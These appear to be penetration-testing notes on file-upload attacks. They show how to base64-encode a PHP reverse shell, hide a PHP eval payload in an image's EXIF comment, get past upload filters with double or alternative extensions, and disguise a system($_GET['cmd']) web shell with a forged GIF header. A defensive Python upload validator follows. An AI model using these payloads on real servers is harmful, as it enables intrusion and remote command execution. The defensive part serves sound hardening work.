Converting Shell to Base64

We use the wrap flag (-w) set to 0 to force the output onto a single line instead of column wrapping.

base64 -w 0 /usr/share/webshells/php/php-reverse-shell.php

Embedding in Image

We can embed a shell in an image with exiftool.

exiftool -Comment='<?php eval(base64_decode("<base64 string here>")); ?>' OIP.jpeg

Bypass File Upload Filtering

One common way to gain a shell is not really a vulnerability at all, but a feature. Often it is possible to upload files to the web server, and this can be abused by simply uploading a reverse shell. The ability to upload a shell is often hindered by filters that try to reject files that could be malicious, so that is what we have to bypass.

Rename It

We can rename our shell and upload it as shell.php.jpg. It passes the filter, and the file is still executed as PHP.

Alternative File Extensions

Sometimes we can use alternative executable file extensions to bypass a block list that only covers the commonly used extensions.

PHP

.phtml
.php
.php3
.php4
.php5
.inc

ASP

.asp
.aspx

Perl

.pl
.pm
.cgi
.lib

Javascript

.jsp
.jspx
.jsw
.jsv
.jspf

ColdFusion

.cfm
.cfml
.cfc
.dbm

Change Magic Byte

If the server checks the file content, you can change the "magic bytes" of the file to trick the content check. For example, you can add the text "GIF89a;" before your shell code so that the file appears to be an image. It would look something like this:

GIF89a;
<?php
system($_GET['cmd']); // or insert your complete shell code here
?>
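The three bypasses in this section (a double extension, an alternative executable extension the block list forgot, and a forged "GIF89a;" prefix) all succeed because the server only inspects what the client controls. The validator below is an added example, not code from the original notes: it allow-lists extensions instead of block-listing them, parses the image container behind the magic bytes, and replaces the client's filename with a server-generated one. The file names and byte strings are constructed samples.

```python
import os
import secrets

# Allow-list: anything not listed is rejected, so a block list that forgot
# .phtml or .php5 is no longer the last line of defence.
MAGIC = {"jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",),
         "png": (b"\x89PNG\r\n\x1a\n",), "gif": (b"GIF87a", b"GIF89a")}

def safe_extension(filename: str):
    """Return the allow-listed extension or None. Exactly one dot is allowed,
    so 'shell.php.jpg' is rejected even though its last suffix is 'jpg'."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or parts[1] not in MAGIC:
        return None
    return parts[1]

def looks_like_image(data: bytes, ext: str) -> bool:
    """Magic bytes alone are defeated by prefixing 'GIF89a;' to a script, so
    also check that the container structure behind the header is intact."""
    if not data.startswith(MAGIC[ext]):
        return False
    if ext == "gif":
        # 6-byte header, 7-byte screen descriptor, optional global colour
        # table, then an image descriptor (0x2C), extension (0x21) or trailer
        # (0x3B) must follow, and the file must end with the 0x3B trailer.
        if len(data) < 14 or data[-1] != 0x3B:
            return False
        packed = data[10]
        gct_len = 3 * (2 << (packed & 0x07)) if packed & 0x80 else 0
        first = 13 + gct_len
        return first < len(data) and data[first] in (0x21, 0x2C, 0x3B)
    if ext == "png":
        # After the signature, IHDR must be the first chunk and IEND the last.
        return data[12:16] == b"IHDR" and data[-8:-4] == b"IEND"
    return data.endswith(b"\xff\xd9")  # JPEG end-of-image marker

def validate_upload(filename: str, data: bytes):
    """Return a server-generated storage name, or None if rejected. Store the
    file outside the web root or where script execution is disabled; the
    random name means nothing the client chose ever reaches a URL."""
    ext = safe_extension(filename)
    if ext is None or not looks_like_image(data, ext):
        return None
    return f"{secrets.token_hex(8)}.{ext}"

# Constructed samples: the smallest valid 1x1 GIF, and a script with a forged
# 'GIF89a;' prefix that even ends in ';' (0x3B) so a naive trailer check passes.
VALID_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")
FORGED_GIF = b"GIF89a;\n<?php echo 'not an image';"
```

Re-encoding the upload with an image library before storing it is the stronger version of the structural check, since it also strips metadata such as the EXIF comment used above.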